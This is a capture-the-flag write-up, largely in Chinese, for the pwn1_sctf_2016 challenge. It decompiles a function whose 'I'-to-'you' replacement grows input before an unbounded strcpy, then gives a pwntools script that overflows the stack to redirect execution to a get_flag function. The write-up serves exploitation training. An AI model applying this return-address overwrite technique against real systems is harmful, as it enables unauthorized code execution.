
pwn1_sctf_2016

Ubuntu 16


0x01


checksec

[*] '/home/zelas/Desktop/pwn/pwn1_sctf_2016/pwn1_sctf_2016'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x8048000)
$ file pwn1_sctf_2016     
pwn1_sctf_2016: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4b1df4d30f1d6b75666c64bed078473a4ad8e799, not stripped

IDA

vuln()函数

// IDA decompilation of vuln() as shown by the author. It reads one line into a
// fixed 32-byte stack buffer, pushes it through std::string (including a
// replace() step), then copies the result back into the SAME 32-byte buffer
// with strcpy(). The copy-back has no length check, so a result longer than
// the original read overruns s.
int vuln()
{
const char *v0; // eax
char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF  -- 32 bytes declared; 0x3C bytes below the saved ebp
char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
char v4[7]; // [esp+40h] [ebp-18h] BYREF
char v5; // [esp+47h] [ebp-11h] BYREF
char v6[7]; // [esp+48h] [ebp-10h] BYREF
char v7[5]; // [esp+4Fh] [ebp-9h] BYREF

printf("Tell me something about yourself: ");
fgets(s, 32, edata); // bounded read: at most 31 chars + NUL; s itself sits 0x3C bytes below the saved ebp
std::string::operator=(&input, s);
std::allocator<char>::allocator(&v5);
std::string::string(v4, "you", &v5);
std::allocator<char>::allocator(v7);
std::string::string(v6, "I", v7);
replace((std::string *)v3); // presumably the "I" -> "you" substitution the author notes below; the result may be longer than what fgets() read
std::string::operator=(&input, v3, v6, v4);
std::string::~string(v3);
std::string::~string(v6);
std::allocator<char>::~allocator(v7);
std::string::~string(v4);
std::allocator<char>::~allocator(&v5);
v0 = (const char *)std::string::c_str((std::string *)&input);
strcpy(s, v0); // unbounded copy of the (possibly grown) string back into the 32-byte s -- this is the overrun; fgets() only bounded the first read
return printf("So, %s\n", s); // author's note: by the time this printf() runs the overflow has already happened
}
//I会被置换成you

可疑函数get_flag

// Helper that runs a fixed shell command via system(); the author lists its
// address (0x8048F0D) on the line following the function and flags it as the
// "suspicious" function of interest.
int get_flag()
{
return system("cat flag.txt");
}
//0x8048F0D

0x02


思路

1. 利用 I → you 的置换，构造 0x3C 字节的数据填满 s

2. 栈溢出，将返回地址 ret 改为 get_flag

s 3CH
ebp 0x4
ret get_flag 0x8048F0D

0x03


exp

from pwn import *

# Author's proof-of-concept for the unbounded strcpy() in vuln() (see the
# decompilation above). Local process line kept commented out by the author.
# io = process(['pwn1_sctf_2016'])
io = remote('node4.buuoj.cn', 27019)

get_flag = 0x8048F0D  # address of get_flag() as listed in the decompilation section
padding = 20  # input length the author chose; the I -> you substitution inside vuln() grows it before the copy-back

# Layout per the author's table: s (0x3C) | saved ebp (4) | return address.
# NOTE(review): p64 is used on an i386 (32-bit) target; only the low 4 bytes
# land in the return slot, the rest is trailing padding.
payload = b'I' * padding + b'a' * 0x4 + p64(get_flag)

io.sendline(payload)
io.interactive()

